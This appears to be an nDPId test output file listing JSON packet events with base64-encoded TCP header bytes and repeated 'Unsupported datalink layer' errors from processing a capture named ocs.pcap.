-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":753,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNcQABABn+BwKi0ArL40DbC2QBQ64tGkd7zyu+wEC9CEuEAAAEBCAoANZQMRwYoKwEBBQre89Bb3vPVxw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":754,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831373} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":754,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNdQABABn+AwKi0ArL40DbC2QBQ64tGkd7zyu+wEC\/WDNgAAAEBCAoANZQVRwYoKwEBBQre89Bb3vPbMw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":755,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831451} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":755,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNeQABABn9\/wKi0ArL40DbC2QBQ64tGkd7zyu+wEC\/WB2QAAAEBCAoANZQdRwYoKwEBBQre89Bb3vPgnw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":756,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831508} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":756,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNfQABABn9+wKi0ArL40DbC2QBQ64tGkd7zyu+wEC\/WAfIAAAEBCAoANZQjRwYoKwEBBQre89Bb3vPmCw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":757,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831595} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":757,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNgQABABn99wKi0ArL40DbC2QBQ64tGkd7zyu+wEC\/W\/HwAAAEBCAoANZQsRwYoKwEBBQre89Bb3vPrdw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":758,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831619} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":758,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNhQABABn+IwKi0ArL40DbC2QBQ64tGkd7z63eAEC+Xi7AAAAEBCAoANZQuRwYofw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":759,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831679} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":759,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNiQABABn+HwKi0ArL40DbC2QBQ64tGkd7z8OOAEC\/qhdoAAAEBCAoANZQ0RwYokA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":760,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831680} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":760,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNjQABABn+GwKi0ArL40DbC2QBQ64tGkd7z9k+AEC\/qgG4AAAEBCAoANZQ0RwYokA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":761,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831746} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":761,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNkQABABn+FwKi0ArL40DbC2QBQ64tGkd7z+7uAEC\/qeu0AAAEBCAoANZQ7RwYong=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":762,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831749} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":762,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNlQABABn+EwKi0ArL40DbC2QBQ64tGkd70ASeAEC\/qdYEAAAEBCAoANZQ7RwYong=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":763,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831750} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":763,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNmQABABn+DwKi0ArL40DbC2QBQ64tGkd70BpOAEC\/WcCkAAAEBCAoANZQ7RwYong=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":764,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831803} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":764,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNnQABABn+CwKi0ArL40DbC2QBQ64tGkd70C\/+AEC\/qapQAAAEBCAoANZRARwYorg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":765,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831806} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":765,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNoQABABn+BwKi0ArL40DbC2QBQ64tGkd70EWuAEC\/qZSYAAAEBCAoANZRBRwYorw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":766,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831809} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":766,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNpQABABn+AwKi0ArL40DbC2QBQ64tGkd70FteAEC\/qX7oAAAEBCAoANZRBRwYorw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":767,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831871} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":767,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNqQABABn9\/wKi0ArL40DbC2QBQ64tGkd70HEOAEC\/qWjsAAAEBCAoANZRHRwYovA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":768,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831878} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":768,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNrQABABn9ywKi0ArL40DbC2QBQ64tGkd70HEOwEC\/qHW8AAAEBCAoANZRIRwYovAEBBQre9CGv3vQnGw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":769,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831929} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":769,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNsQABABn9xwKi0ArL40DbC2QBQ64tGkd70HEOwEC\/qF\/4AAAEBCAoANZRNRwYovAEBBQre9CGv3vQshw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":770,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831936} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":770,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNtQABABn9wwKi0ArL40DbC2QBQ64tGkd70HEOwEC\/qEpIAAAEBCAoANZRNRwYovAEBBQre9CGv3vQx8w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":771,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831937} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":771,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNuQABABn9vwKi0ArL40DbC2QBQ64tGkd70HEOwEC\/qDSYAAAEBCAoANZRNRwYovAEBBQre9CGv3vQ3Xw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":772,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831988} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":772,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNvQABABn9uwKi0ArL40DbC2QBQ64tGkd70HEOwEC\/qB7QAAAEBCAoANZRTRwYovAEBBQre9CGv3vQ8yw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":773,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831990} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":773,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNwQABABn95wKi0ArL40DbC2QBQ64tGkd70PMuAEC+XOdgAAAEBCAoANZRTRwYo3g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":774,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832021} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":774,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNxQABABn94wKi0ArL40DbC2QBQ64tGkd70QjeAEC\/WNB0AAAEBCAoANZRWRwYo6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":775,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832025} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":775,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNyQABABn93wKi0ArL40DbC2QBQ64tGkd70R6OAEC\/BLsQAAAEBCAoANZRXRwYo7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":776,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832079} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":776,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNzQABABn92wKi0ArL40DbC2QBQ64tGkd70TQ+AEC\/qKSMAAAEBCAoANZRcRwYo8w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":777,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832081} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":777,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMN0QABABn91wKi0ArL40DbC2QBQ64tGkd70UnuAEC\/qI7cAAAEBCAoANZRcRwYo8w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":778,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832083} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":778,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMN1QABABn90wKi0ArL40DbC2QBQ64tGkd70V+eAEC\/WHl4AAAEBCAoANZRcRwYo9A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":779,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832169} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":779,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMN2QABABn9zwKi0ArL40DbC2QBQ64tGkd70XVOAEC\/qGMgAAAEBCAoANZRlRwYpAQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":780,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832169} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":780,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMN3QABABn9mwKi0ArL40DbC2QBQ64tGkd70XVOwEC\/qWdwAAAEBCAoANZRlRwYpAQEBBQre9GK\/3vRoKw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":781,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832236} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":781,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMN4QABABn9dwKi0ArL40DbC2QBQ64tGkd70XVPQEC\/qm0AAAAEBCAoANZRsRwYpAQEBBRLe9G2X3vRzA970Yr\/e9Ggr"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":782,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832236} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":782,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMN5QABABn9cwKi0ArL40DbC2QBQ64tGkd70XVPQEC\/qldQAAAEBCAoANZRsRwYpAQEBBRLe9G2X3vR4b970Yr\/e9Ggr"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":783,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832300} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":783,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMN6QABABn9jwKi0ArL40DbC2QBQ64tGkd70aCuwEC\/BM9wAAAEBCAoANZRyRwYpKQEBBQre9G2X3vR4bw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":784,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832705} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":784,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMN7QABABn9uwKi0ArL40DbC2QBQ64tGkd70eG+AEC\/W\/Q0AAAEBCAoANZSbRwYpfQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":785,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832787} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":785,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMN8QABABn9hwKi0ArL40DbC2QBQ64tGkd70eG+wEC\/qB84AAAEBCAoANZSjRwYpfQEBBQre9H3b3vSDRw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":786,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832861} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":786,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMN9QABABn9gwKi0ArL40DbC2QBQ64tGkd70eG+wEC\/qAlsAAAEBCAoANZSqRwYpfQEBBQre9H3b3vSIsw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":787,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652832947} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":787,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMN+QABABn9fwKi0ArL40DbC2QBQ64tGkd70eG+wEC\/q\/OUAAAEBCAoANZSzRwYpfQEBBQre9H3b3vSOHw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":788,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833018} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":788,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMN\/QABABn9ewKi0ArL40DbC2QBQ64tGkd70eG+wEC\/q93IAAAEBCAoANZS6RwYpfQEBBQre9H3b3vSTiw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":789,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833061} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":789,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOAQABABn9pwKi0ArL40DbC2QBQ64tGkd70k4uAEC+s4Y4AAAEBCAoANZS+RwYp5w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":790,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833145} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":790,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOBQABABn9owKi0ArL40DbC2QBQ64tGkd70mPeAEC\/q28sAAAEBCAoANZTHRwYp9w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":791,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833203} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":791,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOCQABABn9bwKi0ArL40DbC2QBQ64tGkd70mPewEC\/qpZIAAAEBCAoANZTMRwYp9wEBBQre9J5j3vSjzw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":792,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833203} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":792,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMODQABABn9awKi0ArL40DbC2QBQ64tGkd70mPewEC\/qoCYAAAEBCAoANZTMRwYp9wEBBQre9J5j3vSpOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":793,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833266} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":793,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOEQABABn9ZwKi0ArL40DbC2QBQ64tGkd70mPewEC\/qmrQAAAEBCAoANZTSRwYp9wEBBQre9J5j3vSupw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":794,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833266} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":794,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOFQABABn9YwKi0ArL40DbC2QBQ64tGkd70mPewEC\/qlUgAAAEBCAoANZTSRwYp9wEBBQre9J5j3vS0Ew=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":795,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833322} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":795,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOGQABABn9jwKi0ArL40DbC2QBQ64tGkd70tBOAEC+swKUAAAEBCAoANZTYRwYqLg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":796,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833323} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":796,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMOHQABABn9iwKi0ArL40DbC2QBQ64tGkd70uX+AEC+Xu04AAAEBCAoANZTYRwYqLg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":797,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833396} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":797,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOIQABABn9VwKi0ArL40DbC2QBQ64tGkd70uX+wEC\/qQ7AAAAEBCAoANZTfRwYqLgEBBQre9L7r3vTEVw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":798,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833397} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":798,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOJQABABn9UwKi0ArL40DbC2QBQ64tGkd70uX+wEC\/qPkMAAAEBCAoANZTgRwYqLgEBBQre9L7r3vTJww=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":799,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833471} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":799,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOKQABABn9TwKi0ArL40DbC2QBQ64tGkd70uX+wEC\/qONAAAAEBCAoANZTnRwYqLgEBBQre9L7r3vTPLw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":800,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833472} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":800,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMOLQABABn9SwKi0ArL40DbC2QBQ64tGkd70uX+wEC\/qM2QAAAEBCAoANZTnRwYqLgEBBQre9L7r3vTUmw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":801,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652833550} 